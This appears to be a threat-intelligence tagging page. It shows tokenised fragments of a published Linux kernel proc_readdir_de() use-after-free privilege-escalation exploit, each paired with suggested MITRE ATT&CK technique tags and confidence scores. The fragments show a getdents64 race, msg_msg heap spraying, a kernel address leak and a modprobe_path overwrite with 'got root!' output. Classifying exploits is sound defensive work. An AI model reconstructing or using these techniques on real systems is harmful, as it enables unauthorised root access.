“[ local ] linux kernel proc _ readdir _ de ( ) 6. 18 - rc5 - local privilege escalation linux kernel proc _ readdir _ de ( ) 6. 18 - rc5 - local privilege escalation * exploit title : linux kernel proc _ readdir _ de ( ) 6. 18 - rc5 - local privilege escalation * cve : cve - 2025…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1068Exploitation for Privilege Escalation
85%
“/ self / net / dev _ snmp6 / ) * [ * ] step 3 : racing getdents vs device removal... * [ + ] uaf hit on attempt 4! anomalous d _ ino = 0xffff88801234abcd * [ * ] step 4 : kernel heap leak : 0xffff88801234abcd * [ * ] step 5 : computing modprobe _ path address... * [ + ] got root!…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1068Exploitation for Privilege Escalation
82%
“— nf _ tables msg _ msg spray reference * * disclaimer : * this exploit targets an already patched vulnerability. it is provided * for educational and authorized security research purposes only. the * author is not responsible for misuse. test only on systems you own. * * / # def…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1070.004File Deletion
71%
“return - 1 ; } info ( " attempting modprobe trigger... " ) ; if ( trigger _ modprobe ( ) = = 0 ) { ok ( " got root! " ) ; return 0 ; } info ( " modprobe _ path overwrite requires kernel - specific offset " ) ; info ( " heap leak confirmed — full chain needs target offsets " ) ; r…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1055.001Dynamic-link Library Injection
59%
“) on / proc / self / net / dev _ snmp6 / * looking for anomalous d _ ino values that indicate the uaf was hit. * * normal d _ ino values are small numbers assigned by proc _ alloc _ inum ( ). * if we see a kernel pointer ( 0xffff... ) in d _ ino, it means we read * from sprayed m…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1068Exploitation for Privilege Escalation
58%
“sys / utsname. h > # include < sys / syscall. h > # include < sys / ipc. h > # include < sys / msg. h > # include < sys / mount. h > # include < sys / ioctl. h > # include < linux / if. h > # include < linux / netlink. h > # include < linux / rtnetlink. h > # include < arpa / ine…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1068Exploitation for Privilege Escalation
53%
“.. " ) ; if ( ctx - > leaked _ addr! = 0 ) { ok ( " kernel heap leak : 0x % 016lx ", ( unsigned long ) ctx - > leaked _ addr ) ; info ( " this address is from msg _ msg m _ list. next / prev " ) ; info ( " it reveals the kernel heap ( physmap ) randomization " ) ; / * * with the …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1055.001Dynamic-link Library Injection
50%
“##─── * / struct linux _ dirent64 { uint64 _ t d _ ino ; int64 _ t d _ off ; unsigned short d _ reclen ; unsigned char d _ type ; char d _ name [ ] ; } ; static long my _ getdents64 ( int fd, void * buf, unsigned long count ) { return syscall ( sys _ getdents64, fd, buf, count ) …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Linux Kernel proc_readdir_de() 6.18-rc5 - Local Privilege Escalation